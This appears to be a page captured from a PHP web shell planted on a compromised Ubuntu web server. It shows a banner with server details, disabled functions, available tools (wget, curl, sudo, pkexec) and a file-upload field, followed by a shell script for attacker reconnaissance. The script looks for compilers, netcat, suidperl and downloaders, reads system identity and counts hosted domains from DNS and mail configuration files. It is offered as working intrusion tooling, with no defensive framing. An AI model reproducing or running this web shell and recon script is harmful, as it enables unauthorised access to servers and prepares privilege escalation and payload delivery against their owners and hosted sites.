Server IP : 127.0.0.2 / Your IP : 18.119.141.157 Web Server : Apache/2.4.18 (Ubuntu) System : User : www-data ( ) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /tmp/barbarpride/ |
Upload File : |
#!/usr/bin/sh USEFUL=(gcc lcc cc ld make php perl python ruby tar gzip bzip bzialfa2 nc locate suidperl) DOWNLOADERS=(wget fetch lynx links curl get lwp-mirror) echo -e '{"useful":[\c' for i in ${USEFUL[@]}; do which=$(which $i) [[ ! -z "$which" ]] && echo -e \"$i\",'\c', done echo -e "\"\"],\c" echo -e '"downloader":[\c' for i in ${DOWNLOADERS[@]}; do which=$(which $i) [[ ! -z "$which" ]] && echo -e \"$i\",'\c', done echo -e "\"\"],\c" echo -e '"uname":["'$(uname -a | cut -c1-120)'"],\c' echo -e '"userid":["'$(stat -c "%u [ %U ]" "$0")'"],\c' echo -e '"groupid":["'$(stat -c "%g [ %G ]" "$0")'"],\c' echo -e '"domains":["\c' VIRTUAL_DOMAINS="/etc/virtual/domainowners" NAMED_CONF="/etc/named.conf" VALIASES="/etc/valiases/" VAR_NAMED="/var/named/" if [[ -e "$VIRTUAL_DOMAINS" ]]; then if [[ -r "$VIRTUAL_DOMAINS" ]]; then echo -e $(awk 'END{print NR}' $VIRTUAL_DOMAINS) "domains\c" elif [[ -r "/etc/virtual/" ]]; then echo -e $(ls "/etc/virtual/" | wc -l) "domains\c" elif [[ -r "$NAMED_CONF" ]]; then echo -e $(awk 'END{print NR}' $NAMED_CONF) "domains\c" else echo -e "Cant Read [ /etc/named.conf ]\c" fi elif [[ -e "$NAMED_CONF" ]] && [[ -e "$VALIASES" ]] && [[ -e "$VAR_NAMED" ]]; then if [[ -r "$VALIASES" ]]; then echo -e $(ls "$VALIASES" | wc -l) "domains\c" elif [[ -r "$VAR_NAMED" ]]; then echo -e $(ls "$VAR_NAMED" | wc -l) "domains\c" elif [[ -r "$NAMED_CONF" ]]; then echo -e $(awk 'END{print NR}' $NAMED_CONF) "domains\c" else echo -e "Cant Read [ /etc/named.conf ]" fi elif [[ -e "$NAMED_CONF" ]] && [[ -r "$NAMED_CONF" ]]; then echo -e $(ls "$NAMED_CONF" | wc -l) "domains\c" else echo -e "Cant Read [ /etc/named.conf ]\c" fi echo -e '"]}\c'